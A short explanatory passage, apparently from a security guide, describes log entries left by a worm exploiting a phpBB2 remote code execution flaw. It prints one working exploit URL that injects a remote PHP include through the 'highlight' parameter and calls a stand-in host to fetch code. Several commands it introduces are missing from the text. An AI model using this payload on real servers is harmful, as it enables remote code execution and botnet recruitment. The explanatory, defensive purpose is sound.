This section exhibits example logs created by a worm exploiting a remote code execution vulnerability within phpBB2. The exploit was sent in the value of the "highlight" parameter of the application's viewtopic.php script. Accessing the following URL downloaded the file root.txt from the domain example.com /phpBB2/viewtopic.php?p=1277&highlight=%2527.$poster=include($_GET[m]).%2527&m=http://example.com/root.txt?&
The worm checks if the PHPBB installation is vulnerable by fetching the following URL, by attempting to print "jSVowMsd" in the output. If it finds "jSVowMsd" in the requested page, that is, if the vulnerability is present in the application, the targeted PHP server will then run the next two commands.
The following downloads software from example.com/chobits/linuxday.txt
Finally, a bot is downloaded and executed in an attempt to join a botnet: